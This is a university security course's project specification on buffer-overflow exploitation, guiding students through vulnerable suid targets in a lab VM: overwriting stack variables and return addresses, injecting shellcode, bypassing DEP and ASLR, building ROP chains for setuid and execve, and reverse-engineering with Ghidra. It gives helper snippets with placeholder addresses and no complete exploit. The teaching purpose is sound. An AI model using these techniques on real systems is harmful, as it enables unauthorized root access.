Project 4: Application Security
Fall 2024
This project counts for 9% of your course grade. Late submissions will be allowed with the use of late days.
This is optionally a group project; you may work in teams of two and submit one project per team. You may also work alone. Note that the final exam will cover project material, so you and your partner should collaborate closely on each part.
The code and other answers you submit must be entirely your team’s own work, and you are bound by the Honor Code. You may discuss the conceptualization of the project and the meaning of the questions, but you may not look at any part of someone else’s solution or collaborate with anyone other than your partner. You may consult published references, provided that you appropriately cite them (e.g., with program comments). Visit the course website for the full collaboration policy.
Solutions must be submitted via the Autograder, following the submission details at the end of this spec.
Introduction
This project will introduce you to control-flow hijacking vulnerabilities in application software, including buffer overflows. We will provide a series of vulnerable programs and a virtual machine environment in which you will develop exploits.
Objectives
- Be able to identify and avoid buffer overflow vulnerabilities in native code.
- Understand the severity of buffer overflows and the necessity of standard defenses.
- Gain familiarity with machine architecture and assembly language.
- Understand the mechanics of buffer overflow exploitation.
Read this First
This project asks you to develop attacks and test them in a virtual machine you control. Attempting the same kinds of attacks against others’ systems without authorization is prohibited by law and university policies and may result in fines, expulsion, and jail time. You must not attack anyone else’s system without authorization! Per the course ethics policy, you are required to respect the privacy and property rights of others at all times, or else you will fail the course. See the “Ethics, Law, and University Policies” section on the course website.
Setup
Buffer-overflow exploitation depends on details of the target system. You must develop and test your attacks inside the Project 4 VM, as it has been configured to disable certain security features that would complicate your work.
-
Follow the setup instructions on the Project 4 VM page.
-
Check out your starter code from GitHub inside the VM. You must do this in a folder in the native Linux filesystem. It won’t work correctly if you use a shared folder located in the host OS.
-
Run
./build.sh
. It will prompt you for uniqnames. Each group’s targets will be slightly different, so make sure your uniqnames are correct! -
Run
./test.sh
to build the targets and test the (currently empty) solutions. The test script will report an error for each of the targets.
Resources and Guidelines
No attack tools allowed!
You may not use special-purpose tools meant for testing security or exploiting vulnerabilities, except for those that come preinstalled in the VM. Use only the preinstalled copies; do not install your own copy of a tool, even if it has the same version number.
Using a prohibited tool to complete your project can be an honor code violation. If you have any questions about whether a certain tool is allowed, please ask on Piazza first so that you don’t accidentally violate this policy.
Control hijacking tutorials
Before you begin this project, review the slides from the control-hijacking lectures and attend lab for additional details. Read the classic article Smashing the Stack for Fun and Profit for an introduction to buffer overflow exploitation.
GDB
You will make use of the GDB debugger for dynamic analysis within the
VM, which you should recall from EECS 280. Useful commands that you may
not know are disassemble
, info reg
, x
, and stepi
. See
the GDB help for details, and don’t be afraid to experiment. The
GDB reference sheet may also be useful.
x86_64 assembly
There are many good references for Intel’s assembly language, but note that our project targets use the 64-bit x86_64 ISA (sometimes abbreviated to x64), not the older 32-bit x86 ISA. The stack is organized differently in x86_64 and x86. If you are reading any online documentation, ensure that it is based on the x86_64 architecture, not x86.
Also note that there are 2 different syntaxes for this assembly language, known as Intel syntax and AT&T syntax. They’re
just 2 ways of expressing the same code. In this class we’re always using Intel syntax, but keep in mind that online
resources might be using AT&T syntax. You can tell which is which because AT&T syntax uses percent signs (%
)
everywhere and Intel syntax doesn’t.
If you are getting a segfault
A segfault means that the program either jumped to or dereferenced an invalid address. This usually means you’re on the right track, because you’ve overwritten something! If you don’t know where to start looking, check the addresses in your exploit, and make sure each one is both correct and in the correct place.
Targets
The target programs for this project are simple, short C programs with (mostly) clear security vulnerabilities. We have provided source code and a build script that compiles all the targets. Your exploits must work against the targets as compiled and executed within the provided VM.
target0: Overwriting a variable on the stack Easy
This program takes input from a file and prints a message. Your job is
to provide input that causes the program to output:
“Hi uniqname! Your grade is A+.
” (You can use either group member’s
uniqname.) To accomplish this, your input will need to overwrite another
variable stored on the stack.
The read_input(char *destination, char *filename)
function can be found in read_input.c
. It opens the file given to
it, then copies the entire contents of the file into memory starting at the address where destination
points.
Here’s one approach you might take:
-
Examine
target0.c
. Where is the buffer overflow? -
Disassemble
_main
(not to be confused with main
). What is its starting address? -
Using GDB from within the VM, set a breakpoint at the beginning of
_main
and run the program:
(gdb) break _main
(gdb) run <(python3 sol0.py)
-
Draw a picture of the stack. How are
name[]
and grade[]
stored relative to each other? -
How could a value read into
name[]
affect the value contained in grade[]
? Test your hypothesis by running ./target0
on the command line with different inputs.
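To make the idea behind these steps concrete, the following sketch models two adjacent stack buffers as a single Python bytearray. The buffer sizes (8 bytes each), the layout (name[] placed directly before grade[]), and the helper names copy_unbounded and read_c_string are all assumptions made for illustration. The real sizes and ordering must be read from the disassembly of your own target.

```python
# Toy model of an unbounded copy into adjacent stack buffers.
# ASSUMPTIONS: 8-byte buffers, with name[] placed directly before grade[].
# The real sizes and ordering come from your target's disassembly.
NAME_SIZE = 8
GRADE_SIZE = 8


def copy_unbounded(memory: bytearray, start: int, data: bytes) -> None:
    """Copy every byte of data into memory at start, with no length check."""
    memory[start:start + len(data)] = data


def read_c_string(memory: bytearray, start: int) -> bytes:
    """Return the bytes from start up to (not including) the first NUL."""
    end = memory.index(0, start)
    return bytes(memory[start:end])


stack = bytearray(NAME_SIZE + GRADE_SIZE + 1)  # +1 keeps a trailing NUL
stack[NAME_SIZE:NAME_SIZE + 2] = b"F\x00"      # grade[] initially holds "F"

# An input longer than name[] spills over into grade[].
copy_unbounded(stack, 0, b"A" * NAME_SIZE + b"B+\x00")

print(read_c_string(stack, NAME_SIZE))  # grade[] no longer holds "F"
```

The model ignores alignment padding and any other locals the compiler may place between the two arrays, which is why drawing the real stack from GDB output matters.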
What to submit
Create a Python 3 program named sol0.py
that prints a line to be
passed as input to the target. Test your program with the command line:
$ ./target0 <(python3 sol0.py)
The above is a little shell trick. It runs python3 sol0.py
, then saves
the output to a “temporary file”. It then uses the name of that temporary
file as a command-line argument for ./target0
.
Hint
In Python 3, you should work with bytes rather than Unicode
strings. To construct a byte literal, use this syntax: b'\xnn'
, where
nn is a 2-digit hex value. To repeat a byte n times, you can do:
b'\xnn'*n
. To output a sequence of bytes, use:
import sys
sys.stdout.buffer.write(b'\x61\x62\x63')
Don’t use print
, because it automatically encodes whatever is being
printed with the default encoding of the console. We don’t want our payload
to be encoded, so we use sys.stdout.buffer.write
.
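The difference matters most for byte values above 0x7f. The sketch below compares the raw bytes with what a UTF-8 encoding of the "same" string would produce; UTF-8 is assumed here only because it is a common console default, and the helper name emit is hypothetical.

```python
import io
import sys

raw = b"\xff\x00\x41"    # three raw bytes
text = "\xff\x00\x41"    # three Unicode code points

# Encoding the string as UTF-8 changes the data:
# U+00FF becomes the two bytes C3 BF.
encoded = text.encode("utf-8")
print(len(raw), len(encoded))  # the lengths differ


def emit(payload: bytes, stream=None) -> None:
    """Write payload unmodified to a binary stream (default: stdout)."""
    stream = sys.stdout.buffer if stream is None else stream
    stream.write(payload)


sink = io.BytesIO()
emit(raw, sink)
assert sink.getvalue() == raw  # bytes arrive exactly as constructed
```

Note that print would also append a newline, which is one more byte the target never asked for.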
target1: Overwriting the return address Easy
This program takes input from a file and prints a message. Your job is
to provide input that makes it output: “Your grade is A+.
” Your
input will need to overwrite the return address so that the function
vulnerable
transfers control to print_good_grade
when it
returns.
-
Examine
target1.c
. Where is the buffer overflow? -
Examine the function
print_good_grade
. What is its starting address? -
Using GDB from within the VM, set a breakpoint at the beginning of
vulnerable
and run the program.
(gdb) break vulnerable
(gdb) run <(python3 sol1.py)
-
Disassemble
vulnerable
and draw the stack. Where is input[]
stored relative to rbp
? How long would an input have to be to overwrite this value and the return address? -
Examine the
rsp
and rbp
registers:
(gdb) info reg
-
What are the current values of the saved frame pointer and return address from the stack frame? You can examine two giant words (8 bytes each) of memory at
rbp
using:
(gdb) x/2gx $rbp
-
What should these values be in order to redirect control to the desired function?
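The arithmetic behind these questions can be sketched as follows, assuming a conventional frame in which the saved frame pointer sits at rbp and the return address at rbp + 8. The 0x10 displacement is a made-up example, not a value from any real target; read the actual displacement from your own disassembly.

```python
# ASSUMPTION: the disassembly shows the buffer starting at rbp - 0x10.
# This displacement is hypothetical; yours will likely differ.
BUF_BELOW_RBP = 0x10
WORD = 8  # size of a saved register or return address on x86_64

# Layout, from lower to higher addresses:
#   [rbp - 0x10] start of the buffer
#   [rbp]        saved frame pointer (8 bytes)
#   [rbp + 8]    return address      (8 bytes)
offset_to_saved_rbp = BUF_BELOW_RBP
offset_to_return_addr = BUF_BELOW_RBP + WORD
bytes_to_cover_return_addr = offset_to_return_addr + WORD

print(offset_to_saved_rbp, offset_to_return_addr, bytes_to_cover_return_addr)
```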
What to submit
Create a Python 3 program named sol1.py
that prints a line to be
passed as input to the target. Test your program with the command line:
$ ./target1 <(python3 sol1.py)
When debugging your program, it may be helpful to view a hex dump of the output. Try this:
$ python3 sol1.py | hd
Remember that x86_64 is little endian. Use Python’s to_bytes
method to
output 64-bit little-endian values like so:
import sys
sys.stdout.buffer.write(0x0123456789abcedf.to_bytes(8, 'little'))
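As a quick check of what little endian means in practice, this sketch packs a value and inspects the resulting bytes. The address 0x401136 is a hypothetical placeholder, not an address from any target.

```python
import struct

addr = 0x0000000000401136  # hypothetical address, for illustration only

le = addr.to_bytes(8, "little")
print(le.hex())  # the least significant byte comes first

# struct.pack with "<Q" (little-endian unsigned 64-bit) gives the same bytes.
assert le == struct.pack("<Q", addr)

# Converting back recovers the original integer.
assert int.from_bytes(le, "little") == addr
```

Comparing this output against the hex dump of your payload is a simple way to confirm that an address landed in the byte order you intended.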
target2: Redirecting control to shellcode Easy
Targets 2 through 7 are owned by the root
user and have the suid
bit set. Your goal is to cause them to launch a shell, which will
therefore have root privileges. Unless otherwise noted, you should use
the shellcode we have provided in shellcode.py
. Successfully placing
this shellcode in memory and setting the instruction pointer to the
beginning of the shellcode (e.g., by returning or jumping to it) will
open a shell.
-
Examine
target2.c
. Where is the buffer overflow? -
Create a Python 3 program named
sol2.py
that outputs the provided shellcode:
import sys
from shellcode import shellcode
sys.stdout.buffer.write(shellcode)
-
Disassemble
vulnerable
. Where does buf
begin relative to rbp
? What is the offset from the start of the shellcode to the saved return address? -
Set up the target in GDB:
$ gdb ./target2
-
Set a breakpoint in
vulnerable
and start the target. -
Identify the address after the call to
read_input
and set a breakpoint there:
(gdb) break *<address>
Run the program. It will stop when it reaches that breakpoint.
(gdb) run <(python3 sol2.py)
-
Examine the bytes of memory where you think the shellcode is to confirm your calculation:
(gdb) x/32bx <address>
-
Disassemble the shellcode:
(gdb) disas/r <address>,+32
How does it work?
-
Modify your solution to overwrite the return address and cause it to jump to the beginning of the shellcode.
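The general shape of such an input can be sketched as a small helper. Everything concrete here is an assumption: the helper name build_payload, the 40-byte offset, the buffer address, and the stand-in bytes used in place of the real shellcode from shellcode.py. Substitute the values you measured in GDB.

```python
def build_payload(code: bytes, offset_to_ret: int, buf_addr: int) -> bytes:
    """Place code at the start of the buffer, pad up to the saved return
    address, then append buf_addr so the function returns into the code."""
    if len(code) > offset_to_ret:
        raise ValueError("code does not fit before the return address")
    padding = b"A" * (offset_to_ret - len(code))
    return code + padding + buf_addr.to_bytes(8, "little")


# ASSUMPTIONS: all three values below are placeholders, not target values.
stand_in_code = b"\xcc" * 16  # stand-in for shellcode.shellcode
payload = build_payload(stand_in_code, offset_to_ret=40,
                        buf_addr=0x7FFFFFFFE000)
print(len(payload))  # offset_to_ret plus 8 bytes of return address
```

Note that the padding also overwrites the saved frame pointer, which is harmless only if nothing uses it before the shellcode runs.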
What to submit
Create a Python 3 program named sol2.py
that prints a line to be
passed as input to the target. Test your program with the command line:
$ ./target2 <(python3 sol2.py)
If you are successful, you will see a root shell prompt (#
). Running
whoami
will output “root
”. Running exit
will return to your normal
shell.
If your program segfaults, you can examine the state at the time of the
crash using GDB with the core dump: gdb ./target2 core
. To enable
creating core dumps, run ulimit -c unlimited
. The file core
won’t be
created if a file with the same name already exists. Also, since the
target runs as root, you will need to run it using sudo ./target2
in
order for the core dump to be created.
target3: Overwriting the return address indirectly Medium
In this target, the buffer overflow is restricted and cannot directly overwrite the return address. You’ll need to find another way. Your input should cause the provided shellcode to execute and open a root shell.
The read_input_with_limit(char *destination, char *filename, size_t limit)
function can be found in read_input.c
.
It opens the file given to it, then copies the contents of the file into memory starting at the address where
destination
points. However, it will only copy the first limit
bytes, even if the file is longer than that.
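The behavior described above can be modeled in a few lines of Python. This is only a model of the description, not the code in read_input.c; the helper name copy_with_limit, the 24-byte memory region, and the limit of 12 are assumptions chosen for illustration.

```python
def copy_with_limit(memory: bytearray, start: int, data: bytes,
                    limit: int) -> int:
    """Copy at most limit bytes of data into memory at start.
    Returns the number of bytes actually copied."""
    chunk = data[:limit]
    memory[start:start + len(chunk)] = chunk
    return len(chunk)


memory = bytearray(24)                # hypothetical region of the stack
copied = copy_with_limit(memory, 0, b"X" * 100, limit=12)

print(copied)                         # only the first 12 bytes were copied
assert memory[12:] == bytearray(12)   # everything past the limit is untouched
```

If the limit exceeds the size of the destination buffer, the copy can still run past the end of the buffer, but only by a bounded amount.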
What to submit
Create a Python 3 program named sol3.py
that prints a line to be
passed as input to the target. Test your program with the command line:
$ ./target3 <(python3 sol3.py)
target4: Beyond strings Medium
This target takes as its command-line argument the name of a data file it will read. The file format is a 64-bit count followed by that many 32-bit integers (all little endian). Create a data file that causes the provided shellcode to execute and opens a root shell.
Hint: First figure out how an attacker can cause a buffer overflow in
this program. Note that the read_elements
function breaks the for-loop
once the end of the file is reached, so the 64-bit count does not need
to be truthful.
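The file format itself is easy to produce with Python's struct module. The sketch below only encodes the format as described; the helper names encode_data_file and split_u64 are hypothetical, and the example values carry no meaning for the actual exploit.

```python
import struct
from typing import Iterable, Tuple


def encode_data_file(count: int, elements: Iterable[int]) -> bytes:
    """Encode a 64-bit count followed by 32-bit integers, little endian."""
    header = struct.pack("<Q", count)
    body = b"".join(struct.pack("<I", e) for e in elements)
    return header + body


def split_u64(value: int) -> Tuple[int, int]:
    """Split a 64-bit value into (low, high) 32-bit halves, the order in
    which they appear in a little-endian file of 32-bit elements."""
    return value & 0xFFFFFFFF, value >> 32


honest = encode_data_file(3, [1, 2, 3])
print(len(honest))  # 8-byte count + 3 * 4-byte elements

# A 64-bit quantity occupies two consecutive 32-bit elements.
lo, hi = split_u64(0x1122334455667788)
assert encode_data_file(0, [lo, hi])[8:] == struct.pack("<Q", 0x1122334455667788)
```

Because the count and the element list are passed separately, the same helper can produce files whose count does not match the number of elements that follow.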
What to submit
Create a Python 3 program named sol4.py
that prints a line to be
passed as input to the target. Test your program with the command line:
$ ./target4 <(python3 sol4.py)
target5: Bypassing DEP Medium
This program resembles target2
, but it has been compiled with data
execution prevention (DEP) enabled. DEP means that the processor will
refuse to execute instructions stored on the stack. You can overflow the
stack and modify values like the return address, but you can’t jump to
any shellcode you inject. You need to find another way to run the
command /bin/sh
and open a root shell.
What to submit
Create a Python 3 program named sol5.py
that prints a line to be
passed as input to the target. Test your program with the command line:
$ ./target5 <(python3 sol5.py)
Warning: Do not try to create a solution that depends on you manually setting environment variables. You cannot assume that the autograder will run your solution with the same environment variables that you have set.
target6: Variable stack position Medium
When we constructed the previous targets, we ensured that the stack
would be in the same position every time the vulnerable function was
called, but this is often not the case in real targets. In fact, a
defense called ASLR (address-space layout randomization) makes buffer
overflows harder to exploit by changing the starting location of the
stack and other memory areas on each execution. This target resembles
target2
, but the stack position is randomly offset by 0–256 bytes each
time it runs. You need to construct an input that always opens a root
shell despite this randomization.
What to submit
Create a Python 3 program named sol6.py
that prints a line to be
passed as input to the target. Test your program with the command line:
$ ./target6 <(python3 sol6.py)
Warning: If you see any output before the root shell is opened, you have not done this target correctly and your solution will not be accepted by the autograder.
target7: Return-oriented programming Hard
This target is identical to target2
, but it is compiled with DEP
enabled. Implement a ROP-based attack to bypass DEP and open a root
shell.
It will be helpful to use a tool such as ROPgadget.
The ROPgadget
command is already installed on the provided VM.
View its usage by running ROPgadget -h
. The --binary
and --multibr
flags will be particularly helpful.
-
Though there are a number of ways you could implement a ROP exploit, for this target you should use the
setuid
syscall to become root, followed by the execve
syscall to run the /bin/sh
binary. This is equivalent to:
setuid(0); execve("/bin/sh", 0, 0);
-
syscall
is the assembly instruction for making a syscall. In order to specify which kind of syscall you want to make (and what arguments you want to make it with), you have to set certain registers to specific values. Consult this table for a reference. -
You may want to look at the assembly in
shellcode.py
for some inspiration. You probably won’t be able to find gadgets that work exactly the same way as this shellcode, but it should be a good starting point. -
We recommend that you start by getting the
execve
call to work on its own, without setuid
. When you do this correctly, it will open a shell, but you won’t be root. Then modify your solution to make it call setuid
first, and you’ll get a root shell.
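Mechanically, a ROP chain is just a sequence of 64-bit words laid out on the stack: gadget addresses interleaved with the values those gadgets pop. The sketch below shows one way to pack such a sequence. The syscall numbers are the standard Linux x86_64 values, but every gadget address is a made-up placeholder, and the gadgets named here may not exist in your binary; use ROPgadget to find what is actually available.

```python
import struct

# Linux x86_64 syscall convention: rax holds the syscall number, and
# rdi, rsi, rdx hold the first three arguments.
SYS_EXECVE = 59
SYS_SETUID = 105


def pack_chain(words):
    """Pack a sequence of 64-bit values (gadget addresses and the data
    they pop) into little-endian bytes, in stack order."""
    return b"".join(struct.pack("<Q", w) for w in words)


# ASSUMPTIONS: every address below is a hypothetical placeholder. Real
# gadget addresses must come from running ROPgadget on your own target.
POP_RDI_RET = 0x401111  # hypothetical "pop rdi ; ret"
POP_RAX_RET = 0x402222  # hypothetical "pop rax ; ret"
SYSCALL_RET = 0x403333  # hypothetical "syscall ; ret"

# Chain fragment for setuid(0): rdi = 0, rax = 105, then syscall.
setuid_chain = pack_chain([
    POP_RDI_RET, 0,
    POP_RAX_RET, SYS_SETUID,
    SYSCALL_RET,
])
print(len(setuid_chain))  # 5 words * 8 bytes each
```

Keeping the chain as a list of integers until the last moment makes it easier to reorder gadgets or swap in a different way of loading a register when the ideal gadget is missing.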
What to submit
Create a Python 3 program named sol7.py
that prints a line to be
passed as input to the target. Test your program with the command line:
$ ./target7 <(python3 sol7.py)
target8: Reverse-engineering with Ghidra Hard
Because this target centers around reverse-engineering and requires extensive exploration, any information that you learn about the binary—even if it is not code written by you—is considered part of your solution. Please use discretion and refrain from discussing details of the target outside of your group, including on Piazza.
For this target, you are provided only a compiled binary named target8
and an input file named input8.dat
. The program is closed-source.
Try running the target with the provided input:
$ ./target8 input8.dat
Hello, world!
What to submit
Create a Python 3 program named sol8.py
that prints a line to be passed as input to the target. Doing so should cause
the lights on the BBB spiral staircase to blink. Test your program with the command line:
$ ./target8 <(python3 sol8.py)
If you’re not in the BBB, you can view the live state of the blinkenlights at blinken.org.
It’s fine if the target also prints some output, but it should not crash.
Hints
-
First, use Ghidra to determine how the program works. We’ll give a Ghidra tutorial in lab.
-
Import
target8
into Ghidra and analyze it. The VM has Ghidra pre-installed, as explained in the instructions. For this assignment, you don’t need to change any of the default options. -
Concentrate on the Functions, Decompiler, and Listing views, all available from the Window menu. As a starting point, use Functions to select
main
, then examine it in the Decompiler. -
The Decompiler produces an approximation of the original C code, but its output is sometimes very different from how a programmer would tend to express the same operation. The original variable names and comments were stripped by the compiler, and often the original data types cannot be automatically inferred. To make the program more readable, the Decompiler lets you manually add comments, rename variables, and correct variable types and function signatures (all by right-clicking). To navigate into a function call, double-click; use the back button (in the upper left) to return to where you were.
-
The Listing view shows the disassembled instructions, which are more accurate but harder to read than the Decompiler view. Use both views together to get a clearer picture of what’s going on. If you select lines of code in the Decompiler, the Listing will highlight the equivalent portion of the disassembly, and vice versa.
-
Inspect the provided input file using
hd input8.dat
. As an intermediate goal, create an input file that causes the target to output Ghidra rocks!
. This will require understanding the target using Ghidra, but you won’t need to do any control-flow hijacking. (You do not need to submit anything for this.) -
The target contains a simple-to-exploit vulnerability similar to one of the earlier targets. It also contains some unused code that will be very useful for accomplishing your objective. Since you don’t have the source code, you’ll need to discover both using Ghidra. Happy hacking!
Frequently Asked Questions
Q: I get a root shell when I run sudo ./test.sh
. Am I done?
A: No! You should only run test.sh
without sudo
. If you run it under sudo
,
then your shells will always be spawned as the root
user, whether you have accomplished
the task of opening a root shell or not. If you previously ran test.sh
with sudo
,
you might get permission errors from Git when you run the test script without sudo
.
To fix this, run the following in the root directory of your local repository:
$ sudo chown -R eecs388:eecs388 .git
Q: My solution works in GDB but not from the command line.
A: The most likely explanation is that you’re referencing data from argv[]
. Since argv[]
comes from outside of _main
’s stack frame, its position can vary depending
on the size of the environment and arguments, which can be slightly different when
running under gdb
. The best solution is to find the data you need in the stack
frame of the vulnerable function, rather than from argv[]
.
Submission Details
-
Create a repo using the GitHub template. Make sure that the repo you create is private.
-
Establish a team on the autograder. Only teams created on the autograder will be able to join the online office hours queue.
Although the autograder submission screen shows the 6 p.m. deadline, you can still submit after this time subject to a lateness penalty, up until the start of the first lab following the deadline. Any submissions after the posted deadline will result in a late deduction, even if your best submission occurred before the deadline. The autograder will not warn you of this. (You don’t get to attempt a higher score after the deadline with no risk.)
Your files can make use of standard Python 3 libraries and the provided
shellcode.py
, but they must be otherwise self-contained. Do not modify
or include the targets, build script, shellcode.py
, etc. Be sure to test
that your solutions work correctly in an unmodified copy of the provided
VM, without installing or updating any packages or changing any environment
variables.